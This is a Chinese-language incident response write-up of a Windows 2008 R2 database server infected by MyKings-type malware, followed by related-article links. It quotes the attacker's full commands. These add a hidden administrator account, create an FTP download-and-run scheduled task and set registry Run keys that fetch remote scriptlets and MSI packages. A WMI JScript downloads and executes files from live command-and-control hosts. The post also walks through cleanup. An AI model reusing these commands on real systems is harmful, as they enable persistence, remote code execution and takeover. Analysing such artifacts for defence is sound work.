【应急响应】Windows应急响应
网管同事反应Windows 2008 R2服务器上多了些exe文件,之前没怎么关注过Windows的监控。
这台主机提供了Mssql和Mysql服务,是台DB服务器,当时由于交换机没有口了,所以配置了公网IP,前端没有硬件防火墙,网管只是启用了本机的windows防火墙,过滤了3389等敏感端口,但是445端口对外开放了。
排查过程
检查Mysql,发现有两个版本,一个5.1,一个5.7,且运行权限为System,先排查下是不是通过MYSQL UDF搞的,检查mysql\lib\plugin目录没有发现异常文件
select * from mysql.func没有发现异常。
检查Mssql,运行权限为USER权限,检查了xp_cmdshell等存储过程没有发现异常。
查看系统账户,发现多了一个IUSR_Servs
服务器本身装了诺顿,报警的exe文件都被隔离了
隔离的文件如下
检测病毒文件的几个网站:
https://x.threatbook.cn/
http://www.virscan.org
https://www.virustotal.com/
https://fireeye.ijinshan.com/上传上去检查结果如下:
http://www.virscan.org
https://x.threatbook.cn/
找到一个txt文件,内容如下:
[down]
http://47.88.216.68:8888/test.dat C:\windows\debug\item.dat 0
http://23.27.127.254:8888/close.bat C:\windows\debug\c.bat 0
[cmd]
新建用户IUSR_Servs并加入到管理员组
net1 user IUSR_Servs ZxcvBMN,.1987&net1 user IUSR_Servs ZxcvBMN,.1987 /ad&net1 localgroup administrators IUSR_Servs /ad&net1 start schedulenet1 user IISUSER_ACCOUNTXX /del&net1 user IUSR_ADMIN /del&net1 user snt0454 /del&taskkill /f /im Logo1_.exe&del c:\windows\Logo1_.exe&taskkill /f /im Update64.exe&del c:\windows\dell\Update64.exe
taskkill /f /im misiai.exe&del misiai.exe&del c:\windows\RichDllt.dll&net1 user asp.net /del&taskkill /f /im winhost.exe&del c:\windows\winhost.exe&del c:\windows\updat.exe
taskkill /f /im netcore.exe&del c:\windows\netcore.exe&taskkill /f /im ygwmgo.exe&del c:\windows\ygwmgo.exe&net1 user aspnet /del&net1 user LOCAL_USER /del&taskkill /f /im Isass.exe&del c:\windows\debug\Isass.exe
添加计划任务
schtasks /create /tn "Mysa" /tr "cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe" /ru "system" /sc onstart /F添加开机启动项
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start1" /d "msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "rundll32" /d "cmd /c if exist c:\windows\debug\item.dat start rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /fecho 123>>1.txt&start C:\windows\debug\c.bat&start rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
@Wmic Process Where "Name='winlogon.exe' And ExecutablePath='C:\Windows\system\winlogon.exe'" Call Terminate &del C:\Windows\system\winlogon.exe
然后运行taskschd.msc然后运行taskschd.msc
删除了计划任务Mysa
运行regedit.exe
删除注册表中启动项中的异常内容
运行services.msc
检查注册服务,未发现异常内容
使用Process Explorer检查进程,发现rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa,Kill掉
使用procmon汉化版,观察进程的注册表的读取,文件的浏览,网络行为,进程行为。
查看诺顿日志发现每隔三个小时下载个文件保存到C:\windows\debug\item.dat
但是计划任务中并没有。然后重启了服务器,发现还是每三个小时就会下载这个文件。
检查网络连接netstat -ano | findstr ESTABLIST未发现异常连接。
每三个小时就会下载一次,那就看这个时间点会起什么异常进程,然后发现每三个小时就会启动C:\Windows\System32\wbem\scrcons.exe
想起来这是利用wmi插件来执行定时执行任务,之前碰到过浏览器首页修改后半个小时又自己变回来就是利用的这个,也是scrcons.exe进程会半小时出来一次。
网上给的方法是安装WMITool,但是这台服务器安装报错。
看到网上说使用Autoruns可以看到WMI脚本,果然发现了异常
脚本内容如下:
var toff=3000;
var url1 = "http://wmi.mykings.top:8888/kill.html";
http = new ActiveXObject("Msxml2.ServerXMLHTTP");
fso = new ActiveXObject("Scripting.FilesystemObject");
wsh = new ActiveXObject("WScript.Shell");
http.open("GET", url1, false);
http.send();
str = http.responseText;
arr = str.split("\r\n");
for (i = 0; i < arr.length; i++) {t = arr[i].split(" ");proc = t[0];path = t[1];dele = t[2];wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) {try { fso.DeleteFile(path, true); }catch (e) {}}
};
var locator=new ActiveXObject("WbemScripting.SWbemLocator");
var service=locator.ConnectServer(".","root/cimv2");
var colItems=service.ExecQuery("select * from Win32_Process");
var e=new Enumerator(colItems);
var t1=new Date().valueOf();
for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()
};
var t2=0;
while(t2-t1<toff){
var t2=new Date().valueOf()
}
var pp=service.get("Win32_Process");
var url="http://wmi.mykings.top:8888/test.html",
http=new ActiveXObject("Microsoft.XMLHTTP"),
ado=new ActiveXObject("ADODB.Stream"),
wsh=new ActiveXObject("WScript.Shell");
for(http.open("GET",url,!1),
http.send(),
str=http.responseText,
arr=str.split("\r\n"),
i=0;arr.length>i;i++)t=arr[i].split(" ",3),
http.open("GET",t[0],!1),
http.send(),
ado.Type=1,
ado.Open(),
ado.Write(http.responseBody),
ado.SaveToFile(t[1],2),
ado.Close(),
1==t[2]&&wsh.Run(t[1]);
pp.create("regsvr32 /s shell32.dll");
pp.create("regsvr32 /s WSHom.Ocx");
pp.create("regsvr32 /s scrrun.dll");
pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");
pp.create("regsvr32 /s jscript.dll");
pp.create("regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll");
pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");http://wmi.mykings.top:8888/kill.html
内容如下:
ntvdm.exe C:\*.exe 0 mskns.exe c:\windows\mskns.exe 0 ntuhost.exe c:\windows\ntuhost.exe 0 dwnclear.exe c:\windows\dwnclear.exe 0 isass.exe c:\windows\debug\isass.exe 0 l.exe C:\Windows\zecc\lsm.exe 0 lgnzmq.exe c:\windows\lgnzmq.exe 0 asoaui.exe c:\windows\asoaui.exe 0 kxsjitc.exe C:\Windows\WindowsUpdate\kxsjitc.exe.exe 0 lmudoftzo.exe C:\Windows\WindowsUpdate\lmudoftzo.exe 0 nczkow.exe C:\Windows\WindowsUpdate\nczkow.exe 0 smssc.exe C:\Windows\WindowsUpdate\nczkow.exe 0 ShelReaKet.exe C:\Windows\ShelReaKet.exe 0http://wmi.mykings.top:8888/test.html
内容如下:
http://47.88.216.68:8888/test.dat C:\windows\debug\item.dat 0删除该脚本
推荐Windows下辅助查杀的几个工具:
Process Monitor
Process Explorer
Wsyscheck
PC Hunter
autoruns改进方案
1)windows下的查杀相比Linux复杂一些,windows下还是必须要安装杀毒软件的。
2)将DB改为内网调用,去掉公网IP,将Mysql迁到Linux下并降权。
参考文章
http://www.jb51.net/hack/82851.html
http://jingyan.baidu.com/article/0964eca26f47b38285f536c6.html
http://bbs.kafan.cn/thread-2047183-1-1.html
http://bbs.kafan.cn/thread-2064286-1-1.html
【应急响应】Windows应急响应相关推荐
- 应急响应 - Windows启动项分析,Windows计划任务分析,Windows服务分析
「作者简介」:CSDN top100.阿里云博客专家.华为云享专家.网络安全领域优质创作者 「推荐专栏」:对网络安全感兴趣的小伙伴可以关注专栏<网络安全入门到精通> Windows应急响应 ...
- Windows 应急响应辅助笔记
目录导航 0x00 前言: 0x01 应急辅助工具: 工具列表: 在线沙箱: 0x02 排查前说明: 0x03 账户排查: 方法一: 方法二: 方法三: 方法四: 0x04 系统日志排查: 安全日志: ...
- Windows应急响应篇
转载至奇安信攻防社区-Windows应急响应篇 Windows应急响应篇 本篇主要以windows下应急响应的基础技术手段进行介绍. 一.概述: 近年来,随着互联网的发展网络安全攻击事件也是大幅度增多 ...
- 应急响应 Windows和Linux操作系统(查杀 后门木马,处理 勒索病毒.)
网络安全--应急响应 应急响应"对应的英文是"Incident Response"或"Emergency Response"等,通常是指一个组织为了应 ...
- Windows应急响应信息采集工具
Windows应急响应信息采集工具 文章目录 Windows应急响应信息采集工具 GetInfo介绍 功能列表 使用说明 注意事项: 可能存在的问题 下载地址 目录结构: 项目地址: GetInfo介 ...
- 应急响应-HW之windows 应急响应之入侵排查技巧
windows 应急响应之入侵排查技巧 文章目录 windows 应急响应之入侵排查技巧 常见的应急响应事件分类: 入侵排查思路 0x01 分析入侵过程 0x02 入侵排查方法 一.检查系统账号安全 ...
- Windows应急响应-文件隐藏
公众号原文连接: Windows应急响应-文件隐藏 在黑帽SEO中,通常会遇到利用easy file locker来实现驱动隐蔽的方式. 1. 下载easy file locker https://d ...
- Windows应急响应排查思路,应急响应基础技能
「作者简介」:CSDN top100.阿里云博客专家.华为云享专家.网络安全领域优质创作者 「推荐专栏」:对网络安全感兴趣的小伙伴可以关注专栏<网络安全入门到精通> Windows应急响应 ...
- 应急响应-----Windows系统排查(学习笔记)
** 1.windows应急响应事件分类 ** Windows 系统的应急事件,按照处理的方式,可分为下面几种类别: 病毒.木马.蠕虫事件 Web 服务器入侵事件或第三方服务入侵事件 系统入侵事件,如 ...
- 【网络安全】什么是应急响应,应急响应中你到底该关注哪些指标?
一.前言 今天这一篇文章主要就是介绍应急响应中的KPI.不过在讨论之前,还是得简单的介绍一下什么是应急响应. 二.什么是应急响应? "应急响应"对应的英文是"Incide ...
最新文章
- 域名过期多长时间才能注册
- Android -ui控件
- cocos lua调用java_【Tech-Lua】Cocos-2dx-Lua调用java的小白教程(三)
- CUDA中的一些基本概念
- 数据太少怎么办?深入浅出,带你了解小样本学习如何“破局”!
- wordpress表格筛选_您是否尝试过使用#1 WordPress插件在您的网站上创建表格?
- OpenCV C++ 常用功能
- CMD中文显示为乱码
- kali PHP网站渗透,小白日记35:kali渗透测试之Web渗透
- 游戏建模教程:肌肉建模丨人体比例及肌肉骨骼介绍
- python微信群管理开禁言_怎么设置群禁言(微信群怎么禁言)
- GRPC Connection Backoff Protocol
- 进制转换——36进制
- RabbitMQ fanout广播消息使用匿名队列
- 货币政策市场化协同与大数据机制研究
- 数据增广:旋转,缩放,平移以及错切
- python26章_44G-26章节Python盖世修炼最新实战 全新升级版Python全栈架构师高级课程 从零实战...
- SQL Server2012 复习
- python前端开发招聘_【天津前端开发招聘_最新天津前端开发招聘信息】-前程无忧...
- 微信小程序入门与实战之更多电影列表与电影搜索